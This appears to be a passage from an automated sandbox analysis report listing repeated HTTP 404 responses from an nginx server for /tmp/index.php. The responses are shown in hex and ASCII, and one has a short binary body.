Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
